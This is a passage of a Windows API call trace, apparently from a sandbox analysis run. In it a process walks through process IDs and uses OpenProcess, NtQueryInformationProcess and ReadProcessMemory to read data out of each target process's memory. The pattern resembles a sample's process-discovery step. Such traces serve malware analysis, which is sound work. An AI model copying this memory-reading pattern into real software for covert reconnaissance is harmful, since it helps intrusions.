[0403.808] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.839] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x240
[0403.840] GetLastError () returned 0x0
[0403.840] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.840] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.840] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.840] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x432910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.841] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4326e4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.842] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.847] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.847] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.847] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.847] malloc (_Size=0x70) returned 0x2c4740
[0403.847] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x43274c, lpBuffer=0x2c4740, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.848] free (_Block=0x2c4740)
[0403.849] CloseHandle (hObject=0x240) returned 1
[0403.850] _ui64tow (_Value=0xbcc, _Buffer="3012", _Radix=10) returned="3020"
[0403.854] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3020") returned 4
[0403.856] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.856] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbcc) returned 0x240
[0403.879] GetLastError () returned 0x0
[0403.879] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.879] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.880] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.880] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f2900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.880] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f26ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.881] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.882] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.883] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.883] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.883] malloc (_Size=0x68) returned 0x2c08e0
[0403.883] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f274e, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0403.883] free (_Block=0x2c08e0)
[0403.884] CloseHandle (hObject=0x240) returned 1
[0403.885] _ui64tow (_Value=0xbd4, _Buffer="3020", _Radix=10) returned="3028"
[0403.890] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3028") returned 4
[0403.891] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.891] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.917] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd4) returned 0x240
[0403.917] GetLastError () returned 0x0
[0403.917] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.917] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.918] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.918] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1328f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.918] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1326e8, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.919] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.920] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.920] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.921] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x131ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.921] malloc (_Size=0x62) returned 0x2c0790
[0403.921] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x132742, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0403.921] free (_Block=0x2c0790)
[0403.922] CloseHandle (hObject=0x240) returned 1
[0403.923] _ui64tow (_Value=0xbdc, _Buffer="3028", _Radix=10) returned="3036"
[0403.928] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3036") returned 4
[0403.929] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.929] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.953] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x240
[0403.954] GetLastError () returned 0x0
[0403.954] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x502930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5026f4, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.956] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.957] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.957] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.957] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x501ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.957] malloc (_Size=0x74) returned 0x2c4740
[0403.957] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x502760, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.958] free (_Block=0x2c4740)
[0403.959] CloseHandle (hObject=0x240) returned 1
[0403.960] _ui64tow (_Value=0xbe4, _Buffer="3036", _Radix=10) returned="3044"
[0403.964] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3044") returned 4
[0403.965] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.965] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.989] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x240
[0403.989] GetLastError () returned 0x0
[0403.989] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.989] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.990] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.990] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2428f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.990] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2426e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.992] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.993] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.993] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.993] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x241ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.993] malloc (_Size=0x62) returned 0x2c0790
[0403.994] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x24273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0403.994] free (_Block=0x2c0790)
[0403.995] CloseHandle (hObject=0x240) returned 1
[0403.995] _ui64tow (_Value=0xbec, _Buffer="3044", _Radix=10) returned="3052"
[0404.000] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3052") returned 4
[0404.001] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.001] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.027] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x240
[0404.027] GetLastError () returned 0x0
[0404.027] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.027] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.027] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.027] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4328c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.028] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4326de, lpBuffer=0x12dd100, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.029] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.030] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.030] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.030] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.030] malloc (_Size=0x54) returned 0x2b9ad0
[0404.030] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x43272a, lpBuffer=0x2b9ad0, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b9ad0*, lpNumberOfBytesRead=0x0) returned 1
[0404.030] free (_Block=0x2b9ad0)
[0404.031] CloseHandle (hObject=0x240) returned 1
[0404.032] _ui64tow (_Value=0xbf4, _Buffer="3052", _Radix=10) returned="3060"
[0404.037] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3060") returned 4
[0404.038] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.038] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x240
[0404.061] GetLastError () returned 0x0
[0404.061] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.061] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.062] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.062] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6228d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.062] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6226da, lpBuffer=0x12dd100, nSize=0x54, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.063] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.065] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.065] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.065] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.065] malloc (_Size=0x5c) returned 0x2c0790
[0404.065] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x62272e, lpBuffer=0x2c0790, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.066] free (_Block=0x2c0790)
[0404.066] CloseHandle (hObject=0x240) returned 1
[0404.068] _ui64tow (_Value=0xbfc, _Buffer="3060", _Radix=10) returned="3068"
[0404.072] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3068") returned 4
[0404.073] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.073] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.094] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x240
[0404.094] GetLastError () returned 0x0
[0404.094] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.094] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.095] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.095] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d28d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.095] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d26de, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.096] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.097] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.097] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.097] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.097] malloc (_Size=0x5e) returned 0x2c0800
[0404.098] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d2734, lpBuffer=0x2c0800, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0404.098] free (_Block=0x2c0800)
[0404.098] CloseHandle (hObject=0x240) returned 1
[0404.109] _ui64tow (_Value=0x304, _Buffer="3068", _Radix=10) returned="772"
[0404.113] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="772") returned 3
[0404.117] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.117] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.138] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x240
[0404.139] GetLastError () returned 0x0
